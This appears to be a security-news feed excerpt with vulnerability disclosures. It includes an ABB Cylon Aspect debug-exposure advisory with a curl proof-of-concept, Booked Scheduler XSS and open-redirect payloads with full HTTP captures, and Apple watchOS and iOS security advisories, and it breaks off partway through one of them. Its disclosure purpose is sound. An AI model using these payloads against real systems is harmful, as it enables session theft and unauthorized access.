ABB Cylon Aspect version 3.08.01 is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.

    ABB Cylon Aspect 3.08.01 (auth/) Active Debug Code VulnerabilityVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: 3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller is deployed to unauthorized actors with debuggingcode still enabled or active, which can create unintended entry points or exposesensitive information.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5851Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5851.phpCWE ID: 489CWE URL: https://cwe.mitre.org/data/definitions/489.html21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ ./db_list.sh ../[*] DEBUG enabled for:/htmlroot/auth/changePassword.php/htmlroot/auth/checkPassword.php/htmlroot/auth/passwordRules.php/htmlroot/auth/sessionCreate.php/htmlroot/auth/sessionLogout.php/htmlroot/auth/sessionValidate.php$ head -n 12 auth/changePassword.php | cat -n     1        <?php     2        $post = (empty($_POST)) ? json_decode(file_get_contents('php://input'), true) : $_POST;     3            4        $debug = (isset($post['debug']) && $post['debug'] === 'On');     5            6        if ($debug) {     7            ini_set('display_startup_errors', 1);     8            ini_set('display_errors', 1);     9            error_reporting(-1);    10        }    11          12        session_start();$ cat auth/changePassword.php | grep 84    84        if (debug) $data->_SESSION = $_SESSION;$ grep -irnHE "debug)|debug )" auth/*.phpauth/changePassword.php:6:if ($debug) {auth/changePassword.php:84:if ($debug) $data->_SESSION = $_SESSION;auth/checkPassword.php:6:if ($debug) {auth/checkPassword.php:54:if ($debug) $data->_SESSION = $_SESSION;auth/passwordRules.php:6:if ($debug) {auth/passwordRules.php:36:if ($debug) $data->_SESSION = $_SESSION;auth/sessionCreate.php:6:if ($debug) {auth/sessionCreate.php:57:if ($debug) $data->_SESSION = $_SESSION;auth/sessionLogout.php:6:if ($debug) {auth/sessionLogout.php:31:if( $debug ) $data->_SESSION = $_SESSION;auth/sessionValidate.php:6:if ($debug) {auth/sessionValidate.php:45:if( $debug ) $data->_SESSION = $_SESSION;$ curl -X POST "http://192.168.73.31/auth/changePassword.php" \> -d "{\> \"appid\":\"1\",\> \"user\":\"teppei\",\> \"oldpass\":\"123456\",\> \"newpass\":\"654321\",\> \"forcelogout\":\"?\",\> \"debug\":\"On\"\> }"

ABB Cylon Aspect 3.08.01 Active Debug Data Exposure

Booked Scheduler version 2.8.5 suffers from cross site scripting and open redirection vulnerabilities.

    # Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5# Date: 10/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.htmlhttps://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:Steps to Reproduce:1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the "resume" parameter add the redirect URL e.g. Burp Collab3. Forward the requestindex.php// HTTP POST login requestPOST /Bookedbo8effotfu/Web/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0[...]email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg// HTTP responseHTTP/1.1 302 FoundDate: Sat, 12 Oct 2024 12:09:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.comContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8Reflected XSS:reservation.php// HTTP GET requestGET/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;new_version=v%3D2.8.5%2Cfs%3D1728734988;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brDnt: 1Sec-Gpc: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 14003<h5><ahref="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Returnto the last page that you were on</a></h5></div>schedule.php// HTTP GET requestGET/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;schedule_calendar_toggle=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 19 Oct 2024 09:12:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 7853<h5><ahref="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Returnto the last page that you were on

Booked Scheduler 2.8.5 Cross Site Scripting / Open Redirection

Apple Security Advisory 10-28-2024-6 - watchOS 11.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-6 watchOS 11.1

watchOS 11.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121565.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Watch Series 6 and later  
Impact: An attacker with physical access to a locked device may be able  
to view sensitive user information  
Description: The issue was addressed with improved authentication.  
CVE-2024-44274: Rizki Maulana (rmrizki.my.id), Matthew Butler, Jake  
Derouin

App Support  
Available for: Apple Watch Series 6 and later  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

CoreMedia Playback  
Available for: Apple Watch Series 6 and later  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreText  
Available for: Apple Watch Series 6 and later  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Foundation  
Available for: Apple Watch Series 6 and later  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

ImageIO  
Available for: Apple Watch Series 6 and later  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Watch Series 6 and later  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

IOSurface  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Shortcuts  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: Apple Watch Series 6 and later  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

Siri  
Available for: Apple Watch Series 6 and later  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)

Siri  
Available for: Apple Watch Series 6 and later  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

WebKit  
Available for: Apple Watch Series 6 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: Apple Watch Series 6 and later  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

Additional recognition

Calculator  
We would like to acknowledge Kenneth Chew for their assistance.

Calendar  
We would like to acknowledge  K宝(@Pwnrin) for their assistance.

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

Messages  
We would like to acknowledge Collin Potter, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Instructions on how to update your Apple Watch software are  
available at https://support.apple.com/108926

To check the version on your Apple Watch, open the Apple Watch app  
on your iPhone and select "My Watch > General > About".

Alternatively, on your watch, select "My Watch > General > About".

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAEsACgkQX+5d1TXa  
IvpYqw//e5YtWRJMacUQbK4oainyrTgy1EkXT3mV7zHSmzfMYOrhfGVd/4yKMsaa  
PSrREy9rcN/oQdLulbAhDfqzEmHSczIxWeP4J48xSR6Od/PY9KFdg4tUJ/DjWp62  
LgvsxyOY6HFt5vvzh0Cguf7xjskHgHKAgX+PbByT/RNLEOk8Q4F3acKyq1D3oGH4  
5yRBHkNyY2rpJtu/6wrxKrn5+H/OFDcO9ABp772nGm75pa1aaxuLlocVdOezZAod  
uWmApZDfLns3wh5yBBuGd9XfXMlpKE0zl1i8y6bPDqe9DBYvS8j0fnZGKNURUaBV  
yIPYJi1IH8V0jTYhnwUN0bTYE1IrEYU1sUSDEcq4vBmSxPxXZmY2sgcIjnEgJY8Q  
d0f1tzd/C0qPYAIpRIFj8bpgbN22uDEVbT58dh+idhg6c+tckQnGEmadPg9c9H/m  
/QxJcc5LdMMwOmyBTSNbwykvb6GKO5TLec1PhU/SImSXxAmtLwNWPk72tZpWEZiI  
ASKal+XcCa/SO3Fyfh+VhhbjmJIdR9wki2R+DXUcwfktOVKb4GWMDWPv6KiRL4ls  
cNudvcc409JBnIJpKAojXcmzPdqWlICbrPTHihyO9Vf7tIRcgxpBaX8YgYy+lyO4  
3kzUGycxUi4kqHao38ag7xNANdHQxO1VTamYDJLYCEXi62kuxno=  
=7KV0  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-6

Apple Security Advisory 10-28-2024-2 - iOS 17.7.1 and iPadOS 17.7.1 addresses buffer overflow, information leakage, and out of bounds read vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-10-28-2024-2 iOS 17.7.1 and iPadOS 17.7.1iOS 17.7.1 and iPadOS 17.7.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121567.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.AccessibilityAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker with physical access to a locked device may be ableto view sensitive user informationDescription: The issue was addressed with improved authentication.CVE-2024-44274: Rizki Maulana (rmrizki.my.id), Matthew Butler, JakeDerouinCoreTextAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted font may result in thedisclosure of process memoryDescription: The issue was addressed with improved checks.CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeCVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeFoundationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Parsing a file may lead to disclosure of user informationDescription: An out-of-bounds read was addressed with improved inputvalidation.CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing an image may result in disclosure of process memoryDescription: This issue was addressed with improved checks.CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day InitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted message may lead to a denial-of-serviceDescription: The issue was addressed with improved bounds checks.CVE-2024-44297: Jex AmroKernelAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to leak sensitive kernel stateDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44239: Mateusz Krzywicki (@krzywix)Managed ConfigurationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: This issue was addressed with improved handling ofsymlinks.CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail AmzdakMobileBackupAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: A logic issue was addressed with improved file handling.CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill(@jjtech@infosec.exchange)SafariAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Maliciously crafted web content may violate iframe sandboxingpolicyDescription: A custom URL scheme handling issue was addressed withimproved input validation.CVE-2024-44155: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)Safari DownloadsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker may be able to misuse a trust relationship todownload malicious contentDescription: This issue was addressed through improved state management.CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)SceneKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to unexpected appterminationDescription: A buffer overflow was addressed with improved sizevalidation.CVE-2024-44144: 냥냥SceneKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to heapcorruptionDescription: This issue was addressed with improved checks.CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: A malicious app may use shortcuts to access restricted filesDescription: A logic issue was addressed with improved checks.CVE-2024-44269: an anonymous researcherSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: A sandboxed app may be able to access sensitive user data insystem logsDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44278: Kirin (@Pwnrin)VoiceOverAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: This issue was addressed by restricting options offered ona locked device.CVE-2024-44261: Braylon (@softwarescool)WebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 6thgeneration and later, and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may prevent ContentSecurity Policy from being enforcedDescription: The issue was addressed with improved checks.WebKit Bugzilla: 278765CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)Additional recognitionSecurityWe would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai ofAlibaba Group for their assistance.SpotlightWe would like to acknowledge Paulo Henrique Batista Rosa de Castro(@paulohbrc) for their assistance.WebKitWe would like to acknowledge Eli Grey (eligrey.com) for theirassistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 17.7.1 and iPadOS 17.7.1".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/ygACgkQX+5d1TXaIvp70A//T4cT9o2AwfLjB9L//65uQu1OEDEoX/dzeVg+V8TDPtTrWCQPhum7J0Djm133fcAFJKoAe65cc3u9C5LH1sNqR9LkMyHVDLavL5cFZRgyHKBJ6JR0AGRRBP6GzGHeU/O5xT7yrJHl31EGODyezzTb+0P5TJ7pCY7SmJNRjrQV0Vhhk87c5bp6dBQavXIIQNKxJU4Z1jPX3XhKaNQ+UwJONWcDMiDLsuuILsZ5bd1DEfviUiw28NmhLSXFcrQjk5qh0/Cago8EYSs/m6geHrLQk+clT1g5UpVBncSyJAY76iUzzrPfgp8lS8mOQztYw5VV9eR+qxpLlJEmROZRg2bOsIMRygmCaA3Z1Eh4sq00jMpS7V7M0BHKBoeRbw2I0asAc0emU1ap/xH4vHGSHEwoPGl36Wl12p3KXNhWIQ3t7jLkQRkq+hvAi9YucBWd84xEq1tbJEImNifiqc4Xe83+QlZfSDmNkavfpxYEKfiojtn2mFQu2FypkZz7+Avrk3F1iY/FFzZqzjr3rOc+tGxHlPPj7lLsjfGRu5iiifC/3H9oRQ6C6KVxS/zDNnaHZDxQkUFOCCOxtSWeCq8ajKyM5wLdqGKRjWS57rwxJM5qxwfWVe/Z76mkSnNm4UnyPu1zHT3vmwXS7uhmkkL+nV3OncIhqF0dGc+abYlSGbFi+rs==+rNo-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-2

Apple Security Advisory 10-28-2024-1 - iOS 18.1 and iPadOS 18.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-10-28-2024-1 iOS 18.1 and iPadOS 18.1iOS 18.1 and iPadOS 18.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/121563.Apple maintains a Security Releases page athttps://support.apple.com/100100 which lists recentsoftware updates with security advisories.AccessibilityAvailable for: iPhone XS and laterImpact: An attacker with physical access to a locked device may be ableto view sensitive user informationDescription: The issue was addressed with improved authentication.CVE-2024-44274: Rizki Maulana (rmrizki.my.id), Matthew Butler, JakeDerouinApp SupportAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A malicious app may be able to run arbitrary shortcuts withoutuser consentDescription: A path handling issue was addressed with improved logic.CVE-2024-44255: an anonymous researcherCoreMedia PlaybackAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A malicious app may be able to access private informationDescription: This issue was addressed with improved handling ofsymlinks.CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine LabCoreTextAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing a maliciously crafted font may result in thedisclosure of process memoryDescription: The issue was addressed with improved checks.CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeCVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeFoundationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Parsing a file may lead to disclosure of user informationDescription: An out-of-bounds read was addressed with improved inputvalidation.CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero DayInitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing an image may result in disclosure of process memoryDescription: This issue was addressed with improved checks.CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day InitiativeImageIOAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing a maliciously crafted message may lead to a denial-of-serviceDescription: The issue was addressed with improved bounds checks.CVE-2024-44297: Jex AmroIOSurfaceAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to cause unexpected system termination orcorrupt kernel memoryDescription: A use-after-free issue was addressed with improved memorymanagement.CVE-2024-44285: an anonymous researcheriTunesAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and 